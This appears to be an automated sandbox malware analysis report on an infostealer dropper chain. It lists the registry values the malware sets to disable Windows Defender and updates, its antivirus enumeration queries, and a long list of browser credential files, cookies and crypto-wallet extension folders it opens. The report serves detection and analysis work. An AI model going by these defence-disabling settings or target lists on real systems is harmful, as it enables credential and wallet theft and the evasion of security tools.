Source: 1dc3787ee3.exe, 0000000C.00000002.3003758072.0000000000D52000.00000002.00000001.01000000.00000010.sdmp, 1dc3787ee3.exe, 00000022.00000000.3145844996.0000000000D52000.00000002.00000001.01000000.00000010.sdmp, 1dc3787ee3.exe.8.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2398961739.0000000000FC2000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Program Manager
Source: 7a5878ed96.exe, 0000000A.00000002.2912103066.0000000000A32000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: gProgram Manager
Source: firefox.exe, 0000001A.00000002.3162446357.000000DF9083B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 1664VO856PFRR45SNXLF.exe, 00000003.00000002.2440418066.0000000000E67000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: t)Program Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002711001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002711001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: c1b0009d40.exe, 00000009.00000003.2893797131.0000000005C44000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.3027367867.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 6.2.skotes.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.NX5XML9A4AMIPXG5AGRT0AH025A0.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.2352124084.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2396576521.0000000000DD1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2359666990.00000000004D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2638387077.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2319457250.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2398844659.0000000000DD1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2358426536.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3151390685.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1dc3787ee3.exe PID: 3568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c1b0009d40.exe PID: 6308, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 10.2.7a5878ed96.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.7a5878ed96.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.num.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.num.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.3175826524.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2870739086.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2913077883.000000000104E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.3018415386.0000000000191000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3079747725.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3041700292.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3169928437.00000000005C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2911715801.00000000005C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3033467651.0000000000191000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3033601352.00000000001AE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.3018510412.00000000001AE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7a5878ed96.exe PID: 2220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 5704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7a5878ed96.exe PID: 5144, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.2198832216.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000000.00000003.2158627510.0000000006121000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: Edge/Default/Extensions/Jaxx Liberty
Source: file.exe, 00000000.00000003.2198832216.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.2113799995.000000000169E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: file.exe, 00000000.00000003.2114729955.0000000001694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a\Roaming\Ethereum
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: file.exe, 00000000.00000003.2127109163.000000000168F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ata\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
